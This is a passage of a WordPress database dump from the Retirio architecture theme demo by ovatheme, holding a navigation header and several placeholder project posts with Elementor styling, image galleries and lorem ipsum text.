href=\"https://demo.ovatheme.com/retirio/shop/\">Shop</a></li>\n<li id=\"menu-item-790\"><a href=\"https://demo.ovatheme.com/retirio/blog/\">Blog</a>\n<ul>\n	<li id=\"menu-item-1092\"><a href=\"https://demo.ovatheme.com/retirio/blog/\">Blog Default</a></li>\n	<li id=\"menu-item-1094\"><a href=\"https://demo.ovatheme.com/retirio/blog/?layout_sidebar=layout_1c\">Default No Sidebar</a></li>\n	<li id=\"menu-item-1095\"><a href=\"https://demo.ovatheme.com/retirio/blog/?blog_template=grid\">Blog Grid</a></li>\n	<li id=\"menu-item-1096\"><a href=\"https://demo.ovatheme.com/retirio/blog/?blog_template=grid&#038;layout_sidebar=layout_1c\">Grid No Sidebar</a></li>\n	<li id=\"menu-item-1097\"><a href=\"https://demo.ovatheme.com/retirio/blog/?blog_template=masonry\">Blog Masonry</a></li>\n	<li id=\"menu-item-1098\"><a href=\"https://demo.ovatheme.com/retirio/blog/?blog_template=masonry&#038;layout_sidebar=layout_1c\">Masonry No Sidebar</a></li>\n</ul>\n</li>\n</ul>        </nav>\n						<form role=\"search\" method=\"get\" action=\"https://demo.ovatheme.com/retirio/\">\n						        <input type=\"search\" placeholder=\"Search …\" value=\"\" name=\"s\" title=\"Search for:\" />\n				   			 	<button type=\"submit\">\n				   			 	</button>\n						</form>									\n		<nav>\n            <button>\n            </button>\n            <nav >\n				<ul id=\"menu-primary-1\"><li><a href=\"https://demo.ovatheme.com/retirio/\">Home</a>\n<ul>\n	<li><a href=\"https://demo.ovatheme.com/retirio/\">Home 1</a></li>\n	<li><a href=\"https://demo.ovatheme.com/retirio/home-2/\">Home 2</a></li>\n	<li><a href=\"https://demo.ovatheme.com/retirio/home-3/\">Home 3</a></li>\n</ul>\n</li>\n<li><a href=\"#\">Pages</a>\n<ul>\n	<li><a href=\"https://demo.ovatheme.com/retirio/about/\">About</a></li>\n	<li><a href=\"https://demo.ovatheme.com/retirio/contact/\">Contact</a></li>\n	<li><a href=\"https://demo.ovatheme.com/retirio/team\">Our Team</a></li>\n	<li><a href=\"https://demo.ovatheme.com/retirio/team/aleesha-brown/\">Team Detail</a></li>\n</ul>\n</li>\n<li><a href=\"https://demo.ovatheme.com/retirio/services/\">Services</a>\n<ul>\n	<li><a href=\"https://demo.ovatheme.com/retirio/services/\">Service Listing</a></li>\n	<li><a href=\"https://demo.ovatheme.com/retirio/service/architecture/\">Service Detail</a></li>\n</ul>\n</li>\n<li><a href=\"#\">Projects</a>\n<ul>\n	<li><a href=\"https://demo.ovatheme.com/retirio/project/?template=template_1\">Archive Project 1</a></li>\n	<li><a href=\"https://demo.ovatheme.com/retirio/project/?template=template_2&#038;posts_per_page=7\">Archive Project 2</a></li>\n	<li><a href=\"https://demo.ovatheme.com/retirio/project/?template=template_3\">Archive Project 3</a></li>\n	<li><a href=\"https://demo.ovatheme.com/retirio/project/?template=template_4&#038;posts_per_page=7\">Archive Project 4</a></li>\n	<li><a href=\"https://demo.ovatheme.com/retirio/project-5/\">Element Projects 5</a></li>\n	<li><a href=\"https://demo.ovatheme.com/retirio/project-6/\">Element Projects 6</a></li>\n	<li><a href=\"https://demo.ovatheme.com/retirio/project-7/\">Element Projects 7</a></li>\n	<li><a href=\"https://demo.ovatheme.com/retirio/project/modern-villa/\">Single Project</a></li>\n</ul>\n</li>\n<li><a href=\"https://demo.ovatheme.com/retirio/shop/\">Shop</a></li>\n<li><a href=\"https://demo.ovatheme.com/retirio/blog/\">Blog</a>\n<ul>\n	<li><a href=\"https://demo.ovatheme.com/retirio/blog/\">Blog Default</a></li>\n	<li><a href=\"https://demo.ovatheme.com/retirio/blog/?layout_sidebar=layout_1c\">Default No Sidebar</a></li>\n	<li><a href=\"https://demo.ovatheme.com/retirio/blog/?blog_template=grid\">Blog Grid</a></li>\n	<li><a href=\"https://demo.ovatheme.com/retirio/blog/?blog_template=grid&#038;layout_sidebar=layout_1c\">Grid No Sidebar</a></li>\n	<li><a href=\"https://demo.ovatheme.com/retirio/blog/?blog_template=masonry\">Blog Masonry</a></li>\n	<li><a href=\"https://demo.ovatheme.com/retirio/blog/?blog_template=masonry&#038;layout_sidebar=layout_1c\">Masonry No Sidebar</a></li>\n</ul>\n</li>\n</ul>			</nav>\n        </nav>\n					 	<!-- Display when you choose background per Post -->\n														<h1>\n															</h1>\n								<ul><li><a href=\"https://demo.ovatheme.com/retirio/\" title=\"Home\">Home</a></li> <li></li><li>Builder Header Footer</li></ul>','Header Banner','','draft','closed','closed','','header-banner-2','','','2023-09-22 10:51:21','2023-09-22 10:51:21','',0,'https://demo.ovatheme.com/retirio/?post_type=ova_framework_hf_el&#038;p=169',0,'ova_framework_hf_el','',0),(4637,1,'2022-06-14 02:15:17','2022-06-14 02:15:17','<style>/*! elementor - v3.6.6 - 08-06-2022 */<br />\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style>\n<h2>Modern villa</h2>\nNeque porro est qui dolorem ipsum quia quaed inventore veritatis et quasi architecto beatae vitae dicta sunt explicabo. Aelltes port lacus quis enim var sed efficitur turpis gilla sed sit amet finibus eros. Lorem Ipsum is simply dummy text of the printing and typesetting industry.\n<h4>Biophilia is the idea that humans possess an innate tendency to seek connections with nature. The term translates</h4>\nWhen an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. Aelltes port lacus quis enim var sed efficitur turpis gilla sed sit amet finibus eros. Lorem Ipsum is simply dummy text of the printing and typesetting industry.\nService:\n<h4> Interior design</h4>\nArchitect:\n<h4> Mike hardson</h4>\nDuration:\n<h4> 4.5 Months</h4>\nLocation:\n<h4> Broklyn, New York</h4>\n<ul>\n 	<li>\n                        <a href=\"https://twitter.com/ovathemes\" target=\"_blank\" rel=\"noopener\">\n</a></li>\n 	<li>\n                        <a href=\"https://www.facebook.com/ovatheme.envato/\" target=\"_blank\" rel=\"noopener\">\n</a></li>\n 	<li>\n                        <a href=\"https://ovatheme.com/\" target=\"_blank\" rel=\"noopener\">\n</a></li>\n 	<li>\n                        <a href=\"https://www.instagram.com/\" target=\"_blank\" rel=\"noopener\">\n</a></li>\n</ul>\n<h2>Before</h2>\nNeque porro est qui dolorem ipsum quia quaed inventore veritatis et quasi architecto beatae vitae dicta sunt explicabo. Aelltes port lacus quis enim var sed efficitur turpis gilla sed sit amet finibus eros. Lorem Ipsum is simply dummy text of the printing and typesetting industry.\n<h2>Challenges</h2>\n 	<link rel=\"stylesheet\" href=\"https://demo.ovatheme.com/retirio/wp-content/plugins/elementor/assets/css/widget-icon-list.min.css\">\n<ul>\n 	<li>\n							<svg aria-hidden=\"true\"><use xlink:href=\"#fas-arrow-circle-right\"></use></svg>\nNemo enim ipsam voluptatem quia voluptas.</li>\n 	<li>\n							<svg aria-hidden=\"true\"><use xlink:href=\"#fas-arrow-circle-right\"></use></svg>\nAccusamus et iusto odio dignissimos ducimus.</li>\n 	<li>\n							<svg aria-hidden=\"true\"><use xlink:href=\"#fas-arrow-circle-right\"></use></svg>\nNam libero tempore, cum soluta nobis est eligend.</li>\n 	<li>\n							<svg aria-hidden=\"true\"><use xlink:href=\"#fas-arrow-circle-right\"></use></svg>\nAccusamus et iusto odio dignissimos ducimus.</li>\n</ul>\nWhen an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged.\n\n<style>/*! elementor - v3.6.6 - 08-06-2022 */<br />\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"570\" height=\"506\" src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/image.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/image.jpg 570w, https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/image-300x266.jpg 300w\" sizes=\"(max-width: 570px) 100vw, 570px\">\n<h2>After</h2>\nNeque porro est qui dolorem ipsum quia quaed inventore veritatis et quasi architecto beatae vitae dicta sunt explicabo. Aelltes port lacus quis enim var sed efficitur turpis gilla sed sit amet finibus eros. Lorem Ipsum is simply dummy text of the printing and typesetting industry.\n<h2>Results</h2>\n<ul>\n 	<li>\n							<svg aria-hidden=\"true\"><use xlink:href=\"#fas-arrow-circle-right\"></use></svg>\nNemo enim ipsam voluptatem quia voluptas.</li>\n 	<li>\n							<svg aria-hidden=\"true\"><use xlink:href=\"#fas-arrow-circle-right\"></use></svg>\nAccusamus et iusto odio dignissimos ducimus.</li>\n 	<li>\n							<svg aria-hidden=\"true\"><use xlink:href=\"#fas-arrow-circle-right\"></use></svg>\nNam libero tempore, cum soluta nobis est eligend.</li>\n 	<li>\n							<svg aria-hidden=\"true\"><use xlink:href=\"#fas-arrow-circle-right\"></use></svg>\nAccusamus et iusto odio dignissimos ducimus.</li>\n</ul>\nWhen an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged.\n<img width=\"570\" height=\"506\" src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/image-2.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/image-2.jpg 570w, https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/image-2-300x266.jpg 300w\" sizes=\"(max-width: 570px) 100vw, 570px\">\n<h3>our gallery</h3>\n<h2>\n								 Photo gallery</h2>\n<a href=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/gallery-1.jpg\" data-fancybox=\"project-photo\" data-caption=\"\">\n<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/gallery-1.jpg\" alt=\"\">\n</a>\n<a href=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/gallery-2.jpg\" data-fancybox=\"project-photo\" data-caption=\"\">\n<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/gallery-2.jpg\" alt=\"\">\n</a>\n<a href=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/gallery-3.jpg\" data-fancybox=\"project-photo\" data-caption=\"\">\n<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/gallery-3.jpg\" alt=\"\">\n</a>','Modern villa','','publish','open','closed','','modern-villa-2','','','2022-06-14 02:15:17','2022-06-14 02:15:17','',0,'https://demo.ovatheme.com/retirio/?post_type=ova_projects&amp;p=613',0,'ova_projects','',0),(4638,1,'2022-06-14 02:17:21','2022-06-14 02:17:21','<style>/*! elementor - v3.6.6 - 08-06-2022 */<br />\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style>\n<h2>Vintage design</h2>\nNeque porro est qui dolorem ipsum quia quaed inventore veritatis et quasi architecto beatae vitae dicta sunt explicabo. Aelltes port lacus quis enim var sed efficitur turpis gilla sed sit amet finibus eros. Lorem Ipsum is simply dummy text of the printing and typesetting industry.\n<h4>Biophilia is the idea that humans possess an innate tendency to seek connections with nature. The term translates</h4>\nWhen an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. Aelltes port lacus quis enim var sed efficitur turpis gilla sed sit amet finibus eros. Lorem Ipsum is simply dummy text of the printing and typesetting industry.\nService:\n<h4> Interior design</h4>\nArchitect:\n<h4> Mike hardson</h4>\nDuration:\n<h4> 4.5 Months</h4>\nLocation:\n<h4> Broklyn, New York</h4>\n<ul>\n 	<li>\n                        <a href=\"https://twitter.com/ovathemes\" target=\"_blank\" rel=\"noopener\">\n</a></li>\n 	<li>\n                        <a href=\"https://www.facebook.com/ovatheme.envato/\" target=\"_blank\" rel=\"noopener\">\n</a></li>\n 	<li>\n                        <a href=\"https://ovatheme.com/\" target=\"_blank\" rel=\"noopener\">\n</a></li>\n 	<li>\n                        <a href=\"https://www.instagram.com/\" target=\"_blank\" rel=\"noopener\">\n</a></li>\n</ul>\n<h2>Before</h2>\nNeque porro est qui dolorem ipsum quia quaed inventore veritatis et quasi architecto beatae vitae dicta sunt explicabo. Aelltes port lacus quis enim var sed efficitur turpis gilla sed sit amet finibus eros. Lorem Ipsum is simply dummy text of the printing and typesetting industry.\n<h2>Challenges</h2>\n 	<link rel=\"stylesheet\" href=\"https://demo.ovatheme.com/retirio/wp-content/plugins/elementor/assets/css/widget-icon-list.min.css\">\n<ul>\n 	<li>\n							<svg aria-hidden=\"true\"><use xlink:href=\"#fas-arrow-circle-right\"></use></svg>\nNemo enim ipsam voluptatem quia voluptas.</li>\n 	<li>\n							<svg aria-hidden=\"true\"><use xlink:href=\"#fas-arrow-circle-right\"></use></svg>\nAccusamus et iusto odio dignissimos ducimus.</li>\n 	<li>\n							<svg aria-hidden=\"true\"><use xlink:href=\"#fas-arrow-circle-right\"></use></svg>\nNam libero tempore, cum soluta nobis est eligend.</li>\n 	<li>\n							<svg aria-hidden=\"true\"><use xlink:href=\"#fas-arrow-circle-right\"></use></svg>\nAccusamus et iusto odio dignissimos ducimus.</li>\n</ul>\nWhen an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged.\n\n<style>/*! elementor - v3.6.6 - 08-06-2022 */<br />\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"570\" height=\"506\" src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/image.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/image.jpg 570w, https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/image-300x266.jpg 300w\" sizes=\"(max-width: 570px) 100vw, 570px\">\n<h2>After</h2>\nNeque porro est qui dolorem ipsum quia quaed inventore veritatis et quasi architecto beatae vitae dicta sunt explicabo. Aelltes port lacus quis enim var sed efficitur turpis gilla sed sit amet finibus eros. Lorem Ipsum is simply dummy text of the printing and typesetting industry.\n<h2>Results</h2>\n<ul>\n 	<li>\n							<svg aria-hidden=\"true\"><use xlink:href=\"#fas-arrow-circle-right\"></use></svg>\nNemo enim ipsam voluptatem quia voluptas.</li>\n 	<li>\n							<svg aria-hidden=\"true\"><use xlink:href=\"#fas-arrow-circle-right\"></use></svg>\nAccusamus et iusto odio dignissimos ducimus.</li>\n 	<li>\n							<svg aria-hidden=\"true\"><use xlink:href=\"#fas-arrow-circle-right\"></use></svg>\nNam libero tempore, cum soluta nobis est eligend.</li>\n 	<li>\n							<svg aria-hidden=\"true\"><use xlink:href=\"#fas-arrow-circle-right\"></use></svg>\nAccusamus et iusto odio dignissimos ducimus.</li>\n</ul>\nWhen an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged.\n<img width=\"570\" height=\"506\" src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/image-2.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/image-2.jpg 570w, https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/image-2-300x266.jpg 300w\" sizes=\"(max-width: 570px) 100vw, 570px\">\n<h3>our gallery</h3>\n<h2>\n								 Photo gallery</h2>\n<a href=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/gallery-1.jpg\" data-fancybox=\"project-photo\" data-caption=\"\">\n<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/gallery-1.jpg\" alt=\"\">\n</a>\n<a href=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/gallery-2.jpg\" data-fancybox=\"project-photo\" data-caption=\"\">\n<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/gallery-2.jpg\" alt=\"\">\n</a>\n<a href=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/gallery-3.jpg\" data-fancybox=\"project-photo\" data-caption=\"\">\n<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/gallery-3.jpg\" alt=\"\">\n</a>','Vintage design','','publish','open','closed','','vintage-design-2','','','2022-06-14 02:17:21','2022-06-14 02:17:21','',0,'https://demo.ovatheme.com/retirio/?post_type=ova_projects&amp;p=619',0,'ova_projects','',0),(4639,1,'2022-06-14 02:18:51','2022-06-14 02:18:51','<style>/*! elementor - v3.6.6 - 08-06-2022 */<br />\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style>\n<h2>Simple home</h2>\nNeque porro est qui dolorem ipsum quia quaed inventore veritatis et quasi architecto beatae vitae dicta sunt explicabo. Aelltes port lacus quis enim var sed efficitur turpis gilla sed sit amet finibus eros. Lorem Ipsum is simply dummy text of the printing and typesetting industry.\n<h4>Biophilia is the idea that humans possess an innate tendency to seek connections with nature. The term translates</h4>\nWhen an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. Aelltes port lacus quis enim var sed efficitur turpis gilla sed sit amet finibus eros. Lorem Ipsum is simply dummy text of the printing and typesetting industry.\nService:\n<h4> Interior design</h4>\nArchitect:\n<h4> Mike hardson</h4>\nDuration:\n<h4> 4.5 Months</h4>\nLocation:\n<h4> Broklyn, New York</h4>\n<ul>\n 	<li>\n                        <a href=\"https://twitter.com/ovathemes\" target=\"_blank\" rel=\"noopener\">\n</a></li>\n 	<li>\n                        <a href=\"https://www.facebook.com/ovatheme.envato/\" target=\"_blank\" rel=\"noopener\">\n</a></li>\n 	<li>\n                        <a href=\"https://ovatheme.com/\" target=\"_blank\" rel=\"noopener\">\n</a></li>\n 	<li>\n                        <a href=\"https://www.instagram.com/\" target=\"_blank\" rel=\"noopener\">\n</a></li>\n</ul>\n<h2>Before</h2>\nNeque porro est qui dolorem ipsum quia quaed inventore veritatis et quasi architecto beatae vitae dicta sunt explicabo. Aelltes port lacus quis enim var sed efficitur turpis gilla sed sit amet finibus eros. Lorem Ipsum is simply dummy text of the printing and typesetting industry.\n<h2>Challenges</h2>\n 	<link rel=\"stylesheet\" href=\"https://demo.ovatheme.com/retirio/wp-content/plugins/elementor/assets/css/widget-icon-list.min.css\">\n<ul>\n 	<li>\n							<svg aria-hidden=\"true\"><use xlink:href=\"#fas-arrow-circle-right\"></use></svg>\nNemo enim ipsam voluptatem quia voluptas.</li>\n 	<li>\n							<svg aria-hidden=\"true\"><use xlink:href=\"#fas-arrow-circle-right\"></use></svg>\nAccusamus et iusto odio dignissimos ducimus.</li>\n 	<li>\n							<svg aria-hidden=\"true\"><use xlink:href=\"#fas-arrow-circle-right\"></use></svg>\nNam libero tempore, cum soluta nobis est eligend.</li>\n 	<li>\n							<svg aria-hidden=\"true\"><use xlink:href=\"#fas-arrow-circle-right\"></use></svg>\nAccusamus et iusto odio dignissimos ducimus.</li>\n</ul>\nWhen an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged.\n\n<style>/*! elementor - v3.6.6 - 08-06-2022 */<br />\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"570\" height=\"506\" src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/image.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/image.jpg 570w, https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/image-300x266.jpg 300w\" sizes=\"(max-width: 570px) 100vw, 570px\">\n<h2>After</h2>\nNeque porro est qui dolorem ipsum quia quaed inventore veritatis et quasi architecto beatae vitae dicta sunt explicabo. Aelltes port lacus quis enim var sed efficitur turpis gilla sed sit amet finibus eros. Lorem Ipsum is simply dummy text of the printing and typesetting industry.\n<h2>Results</h2>\n<ul>\n 	<li>\n							<svg aria-hidden=\"true\"><use xlink:href=\"#fas-arrow-circle-right\"></use></svg>\nNemo enim ipsam voluptatem quia voluptas.</li>\n 	<li>\n							<svg aria-hidden=\"true\"><use xlink:href=\"#fas-arrow-circle-right\"></use></svg>\nAccusamus et iusto odio dignissimos ducimus.</li>\n 	<li>\n							<svg aria-hidden=\"true\"><use xlink:href=\"#fas-arrow-circle-right\"></use></svg>\nNam libero tempore, cum soluta nobis est eligend.</li>\n 	<li>\n							<svg aria-hidden=\"true\"><use xlink:href=\"#fas-arrow-circle-right\"></use></svg>\nAccusamus et iusto odio dignissimos ducimus.</li>\n</ul>\nWhen an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged.\n<img width=\"570\" height=\"506\" src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/image-2.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/image-2.jpg 570w, https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/image-2-300x266.jpg 300w\" sizes=\"(max-width: 570px) 100vw, 570px\">\n<h3>our gallery</h3>\n<h2>\n								 Photo gallery</h2>\n<a href=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/gallery-1.jpg\" data-fancybox=\"project-photo\" data-caption=\"\">\n<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/gallery-1.jpg\" alt=\"\">\n</a>\n<a href=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/gallery-2.jpg\" data-fancybox=\"project-photo\" data-caption=\"\">\n<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/gallery-2.jpg\" alt=\"\">\n</a>\n<a href=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/gallery-3.jpg\" data-fancybox=\"project-photo\" data-caption=\"\">\n<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/gallery-3.jpg\" alt=\"\">\n</a>','Simple home','','publish','open','closed','','simple-home-2','','','2022-06-14 02:18:51','2022-06-14 02:18:51','',0,'https://demo.ovatheme.com/retirio/?post_type=ova_projects&amp;p=624',0,'ova_projects','',0),(4640,1,'2022-06-14 02:21:05','2022-06-14 02:21:05','<style>/*! elementor - v3.6.6 - 08-06-2022 */<br />\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style>\n<h2>Luxury room</h2>\nNeque porro est qui dolorem ipsum quia quaed inventore veritatis et quasi architecto beatae vitae dicta sunt explicabo. Aelltes port lacus quis enim var sed efficitur turpis gilla sed sit amet finibus eros. Lorem Ipsum is simply dummy text of the printing and typesetting industry.\n<h4>Biophilia is the idea that humans possess an innate tendency to seek connections with nature. The term translates</h4>\nWhen an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. Aelltes port lacus quis enim var sed efficitur turpis gilla sed sit amet finibus eros. Lorem Ipsum is simply dummy text of the printing and typesetting industry.\nService:\n<h4> Interior design</h4>\nArchitect:\n<h4> Mike hardson</h4>\nDuration:\n<h4> 4.5 Months</h4>\nLocation:\n<h4> Broklyn, New York</h4>\n<ul>\n 	<li>\n                        <a href=\"https://twitter.com/ovathemes\" target=\"_blank\" rel=\"noopener\">\n</a></li>\n 	<li>\n                        <a href=\"https://www.facebook.com/ovatheme.envato/\" target=\"_blank\" rel=\"noopener\">\n</a></li>\n 	<li>\n                        <a href=\"https://ovatheme.com/\" target=\"_blank\" rel=\"noopener\">\n</a></li>\n 	<li>\n                        <a href=\"https://www.instagram.com/\" target=\"_blank\" rel=\"noopener\">\n</a></li>\n</ul>\n<h2>Before</h2>\nNeque porro est qui dolorem ipsum quia quaed inventore veritatis et quasi architecto beatae vitae dicta sunt explicabo. Aelltes port lacus quis enim var sed efficitur turpis gilla sed sit amet finibus eros. Lorem Ipsum is simply dummy text of the printing and typesetting industry.\n<h2>Challenges</h2>\n 	<link rel=\"stylesheet\" href=\"https://demo.ovatheme.com/retirio/wp-content/plugins/elementor/assets/css/widget-icon-list.min.css\">\n<ul>\n 	<li>\n							<svg aria-hidden=\"true\"><use xlink:href=\"#fas-arrow-circle-right\"></use></svg>\nNemo enim ipsam voluptatem quia voluptas.</li>\n 	<li>\n							<svg aria-hidden=\"true\"><use xlink:href=\"#fas-arrow-circle-right\"></use></svg>\nAccusamus et iusto odio dignissimos ducimus.</li>\n 	<li>\n							<svg aria-hidden=\"true\"><use xlink:href=\"#fas-arrow-circle-right\"></use></svg>\nNam libero tempore, cum soluta nobis est eligend.</li>\n 	<li>\n							<svg aria-hidden=\"true\"><use xlink:href=\"#fas-arrow-circle-right\"></use></svg>\nAccusamus et iusto odio dignissimos ducimus.</li>\n</ul>\nWhen an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged.\n\n<style>/*! elementor - v3.6.6 - 08-06-2022 */<br />\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"570\" height=\"506\" src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/image.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/image.jpg 570w, https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/image-300x266.jpg 300w\" sizes=\"(max-width: 570px) 100vw, 570px\">\n<h2>After</h2>\nNeque porro est qui dolorem ipsum quia quaed inventore veritatis et quasi architecto beatae vitae dicta sunt explicabo. Aelltes port lacus quis enim var sed efficitur turpis gilla sed sit amet finibus eros. Lorem Ipsum is simply dummy text of the printing and typesetting industry.\n<h2>Results</h2>\n<ul>\n 	<li>\n							<svg aria-hidden=\"true\"><use xlink:href=\"#fas-arrow-circle-right\"></use></svg>\nNemo enim ipsam voluptatem quia voluptas.</li>\n 	<li>\n							<svg aria-hidden=\"true\"><use xlink:href=\"#fas-arrow-circle-right\"></use></svg>\nAccusamus et iusto odio dignissimos ducimus.</li>\n 	<li>\n							<svg aria-hidden=\"true\"><use xlink:href=\"#fas-arrow-circle-right\"></use></svg>\nNam libero tempore, cum soluta nobis est eligend.</li>\n 	<li>\n							<svg aria-hidden=\"true\"><use xlink:href=\"#fas-arrow-circle-right\"></use></svg>\nAccusamus et iusto odio dignissimos ducimus.</li>\n</ul>\nWhen an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged.\n<img width=\"570\" height=\"506\" src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/image-2.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/image-2.jpg 570w, https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/image-2-300x266.jpg 300w\" sizes=\"(max-width: 570px) 100vw, 570px\">\n<h3>our gallery</h3>\n<h2>\n								 Photo gallery</h2>\n<a href=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/gallery-1.jpg\" data-fancybox=\"project-photo\" data-caption=\"\">\n<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/gallery-1.jpg\" alt=\"\">\n</a>\n<a href=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/gallery-2.jpg\" data-fancybox=\"project-photo\" data-caption=\"\">\n<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/gallery-2.jpg\" alt=\"\">\n</a>\n<a href=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/gallery-3.jpg\" 